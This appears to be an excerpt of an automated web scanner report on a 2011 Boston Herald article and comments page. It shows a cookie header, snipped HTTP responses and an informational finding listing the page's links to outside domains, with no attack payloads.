Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Demail&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://www.myspace.com" >website</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(108) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.289. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Dcomments%26srvc%3Dhome%26position%3Dactive&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png
http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png
http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg
http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Dcomments%26srvc%3Dhome%26position%3Dactive&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982350,5,0);" ><img id="thumb_up_1982350" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982350,1,0);"><img id="thumb_down_1982350" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982350, 'chefsonny');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982350#cnum1982350"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982350','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982370,5,0);" ><img id="thumb_up_1982370" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982370,1,0);"><img id="thumb_down_1982370" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982370, 'skipper66666');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982370#cnum1982370"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982370','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982389,5,0);" ><img id="thumb_up_1982389" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982389,1,0);"><img id="thumb_down_1982389" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982389, 'skeezix66');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982389#cnum1982389"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982389','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982394,5,0);" ><img id="thumb_up_1982394" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982394,1,0);"><img id="thumb_down_1982394" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982394, 'WhyWorry');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982394#cnum1982394"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982394','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982396,5,0);" ><img id="thumb_up_1982396" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982396,1,0);"><img id="thumb_down_1982396" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982396, 'joeromano');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982396#cnum1982396"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982396','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982399,5,0);" ><img id="thumb_up_1982399" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982399,1,0);"><img id="thumb_down_1982399" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982399, 'bobo');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982399#cnum1982399"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982399','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982401,5,0);" ><img id="thumb_up_1982401" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982401,1,0);"><img id="thumb_down_1982401" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982401, 'PollyfromBoston');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982401#cnum1982401"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982401','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982402,5,0);" ><img id="thumb_up_1982402" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
